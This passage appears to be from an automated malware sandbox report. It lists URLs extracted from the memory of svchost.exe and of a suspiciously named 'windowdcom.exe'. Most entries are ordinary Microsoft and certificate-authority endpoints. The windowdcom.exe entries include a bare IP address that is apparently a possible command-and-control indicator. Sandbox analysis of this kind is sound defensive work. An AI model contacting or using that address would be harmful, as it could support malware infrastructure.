                    Source: svchost.exe, 0000001B.00000002.1210270479.00000148F0C8F000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                    Source: svchost.exe, 0000001B.00000002.1210656738.00000148F1364000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdH
                    Source: svchost.exe, 0000001B.00000002.1210656738.00000148F1364000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds
                    Source: svchost.exe, 0000001B.00000002.1210270479.00000148F0C8F000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                    Source: svchost.exe, 0000001B.00000003.822982893.00000148F133B000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdP
                    Source: svchost.exe, 0000001B.00000002.1210212208.00000148F0C7F000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-
                    Source: svchost.exe, 0000001B.00000003.1209653226.00000148F0C5A000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
                    Source: CCFEED7EF3CD3BBD21329435542A98D2_9C2DDAC79C917837883918D6BB58BE90.27.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQQX6Z6gAidtSefNc6DC0OInqPHDQQUD4BhHIIxYdUvKOe
                    Source: svchost.exe, 0000001B.00000002.1210398171.00000148F0CDC000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: svchost.exe, 00000006.00000002.598391848.0000013C6860F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                    Source: svchost.exe, 0000001B.00000002.1210384278.00000148F0CD6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                    Source: svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootCA.crlhttp://crl4.digicert.com/Di
                    Source: svchost.exe, 0000001B.00000002.1210398171.00000148F0CDC000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertSHA2SecureServerCA.crlhttp://crl4.digicert.
                    Source: svchost.exe, 00000006.00000002.598391848.0000013C6860F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                    Source: svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmpString found in binary or memory: http://passport.net/tb
                    Source: windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpString found in binary or memory: http://r3.i.lencr.org/0-
                    Source: windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpString found in binary or memory: http://r3.o.lencr.org0
                    Source: svchost.exe, 0000001B.00000003.817470104.00000148F1357000.00000004.00000001.sdmpString found in binary or memory: http://schemas.mi
                    Source: svchost.exe, 0000001B.00000002.1210610354.00000148F1337000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: svchost.exe, 0000001B.00000002.1210270479.00000148F0C8F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                    Source: svchost.exe, 0000001B.00000002.1210610354.00000148F1337000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.817546441.00000148F1362000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                    Source: svchost.exe, 0000001B.00000002.1210610354.00000148F1337000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc2
                    Source: svchost.exe, 0000001B.00000003.822982893.00000148F133B000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scRL
                    Source: svchost.exe, 0000001B.00000002.1210610354.00000148F1337000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc_0
                    Source: svchost.exe, 0000001B.00000002.1210610354.00000148F1337000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scc8=
                    Source: svchost.exe, 0000001B.00000002.1210610354.00000148F1337000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scon
                    Source: svchost.exe, 0000001B.00000003.823655029.00000148F1379000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scr
                    Source: svchost.exe, 0000001B.00000002.1210270479.00000148F0C8F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                    Source: svchost.exe, 0000001B.00000002.1210610354.00000148F1337000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.823013548.00000148F1332000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                    Source: svchost.exe, 0000001B.00000003.822982893.00000148F133B000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                    Source: svchost.exe, 0000001B.00000002.1210610354.00000148F1337000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                    Source: svchost.exe, 0000001B.00000003.823655029.00000148F1379000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustpi7
                    Source: svchost.exe, 0000001D.00000002.961089640.0000021C5EF30000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
                    Source: svchost.exe, 00000009.00000002.308009587.0000020842013000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                    Source: svchost.exe, 0000001B.00000002.1210384278.00000148F0CD6000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0~
                    Source: svchost.exe, 00000007.00000002.1275929879.000002544DE43000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                    Source: svchost.exe, 00000007.00000002.1275929879.000002544DE43000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                    Source: windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpString found in binary or memory: https://167.114.153.153/
                    Source: windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpString found in binary or memory: https://167.114.153.153/V
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                    Source: svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502ssuer0
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813343188.00000148F1350000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813301133.00000148F132E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                    Source: svchost.exe, 0000001B.00000003.813343188.00000148F1350000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813301133.00000148F132E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80600
                    Source: svchost.exe, 0000001B.00000003.813343188.00000148F1350000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813301133.00000148F132E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601
                    Source: svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603
                    Source: svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604
                    Source: svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                    Source: svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601I
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                    Source: svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                    Source: svchost.exe, 0000001B.00000003.813514950.00000148F1348000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/msangcwam
                    Source: svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://account.livex
                    Source: svchost.exe, 00000007.00000002.1275929879.000002544DE43000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                    Source: svchost.exe, 00000007.00000002.1275929879.000002544DE43000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.comr
                    Source: svchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                    Source: svchost.exe, 00000007.00000002.1275929879.000002544DE43000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                    Source: svchost.exe, 00000007.00000002.1275929879.000002544DE43000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                    Source: svchost.exe, 00000009.00000003.307704369.0000020842049000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                    Source: svchost.exe, 00000009.00000002.308058591.000002084203D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                    Source: svchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                    Source: svchost.exe, 00000009.00000003.307704369.0000020842049000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                    Source: svchost.exe, 00000009.00000003.285964964.0000020842030000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                    Source: svchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                    Source: svchost.exe, 00000009.00000002.308058591.000002084203D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                    Source: svchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                    Source: svchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                    Source: svchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                    Source: svchost.exe, 00000009.00000003.285964964.0000020842030000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                    Source: svchost.exe, 00000009.00000003.307792601.0000020842041000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                    Source: svchost.exe, 00000009.00000003.307792601.0000020842041000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                    Source: svchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                    Source: svchost.exe, 00000009.00000003.307704369.0000020842049000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                    Source: svchost.exe, 00000009.00000003.307704369.0000020842049000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                    Source: svchost.exe, 00000009.00000003.307704369.0000020842049000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                    Source: svchost.exe, 00000009.00000003.307704369.0000020842049000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                    Source: svchost.exe, 00000009.00000002.308083238.0000020842064000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.307792601.0000020842041000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                    Source: svchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                    Source: svchost.exe, 00000009.00000003.285964964.0000020842030000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.308058591.000002084203D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 00000009.00000003.285964964.0000020842030000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                    Source: svchost.exe, 0000001B.00000003.825047154.00000148F1A05000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210270479.00000148F0C8F000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
                    Source: svchost.exe, 0000001B.00000003.813310129.00000148F133B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                    Source: svchost.exe, 0000001B.00000003.813545902.00000148F1369000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf?iww=1
                    Source: svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srfH
                    Source: svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/IfExi
                    Source: svchost.exe, 0000001B.00000003.813301133.00000148F132E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80502
                    Source: svchost.exe, 0000001B.00000003.813343188.00000148F1350000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813301133.00000148F132E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80600
                    Source: svchost.exe, 0000001B.00000003.813343188.00000148F1350000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813301133.00000148F132E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80601
                    Source: svchost.exe, 0000001B.00000003.813641140.00000148F130E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                    Source: svchost.exe, 0000001B.00000003.813436216.00000148F130E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                    Source: svchost.exe, 0000001B.00000003.813436216.00000148F130E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                    Source: svchost.exe, 0000001B.00000003.813514950.00000148F1348000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210104992.00000148F0C29000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                    Source: svchost.exe, 0000001B.00000002.1210104992.00000148F0C29000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813310129.00000148F133B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                    Source: svchost.exe, 0000001B.00000003.813310129.00000148F133B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813545902.00000148F1369000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                    Source: svchost.exe, 0000001B.00000002.1210384278.00000148F0CD6000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210573981.00000148F1313000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825092954.00000148F0CFD000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                    Source: svchost.exe, 0000001B.00000003.813514950.00000148F1348000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                    Source: svchost.exe, 0000001B.00000003.813514950.00000148F1348000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                    Source: svchost.exe, 0000001B.00000003.813514950.00000148F1348000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                    Source: svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecunlineLog
                    Source: svchost.exe, 0000001B.00000003.813436216.00000148F130E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                    Source: svchost.exe, 0000001B.00000003.813364124.00000148F1363000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                    Source: svchost.exe, 0000001B.00000003.813310129.00000148F133B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                    Source: svchost.exe, 0000001B.00000003.813364124.00000148F1363000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                    Source: svchost.exe, 0000001B.00000003.813364124.00000148F1363000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                    Source: svchost.exe, 0000001B.00000002.1210104992.00000148F0C29000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813310129.00000148F133B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                    Source: svchost.exe, 0000001B.00000003.813545902.00000148F1369000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf?
                    Source: svchost.exe, 0000001B.00000002.1210104992.00000148F0C29000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cplive.com
                    Source: svchost.exe, 0000001B.00000003.813430606.00000148F1335000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfsrfsrf060805&fid=cp.live.com
                    Source: svchost.exe, 0000001B.00000003.813364124.00000148F1363000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                    Source: svchost.exe, 0000001B.00000003.813364124.00000148F1363000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                    Source: svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConneH
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813343188.00000148F1350000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813301133.00000148F132E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813343188.00000148F1350000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813301133.00000148F132E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                    Source: svchost.exe, 0000001B.00000003.813364124.00000148F1363000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                    Source: svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813301133.00000148F132E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813343188.00000148F1350000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813301133.00000148F132E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                    Source: svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                    Source: svchost.exe, 0000001B.00000003.813343188.00000148F1350000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813301133.00000148F132E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&amp;fid=cp
                    Source: svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
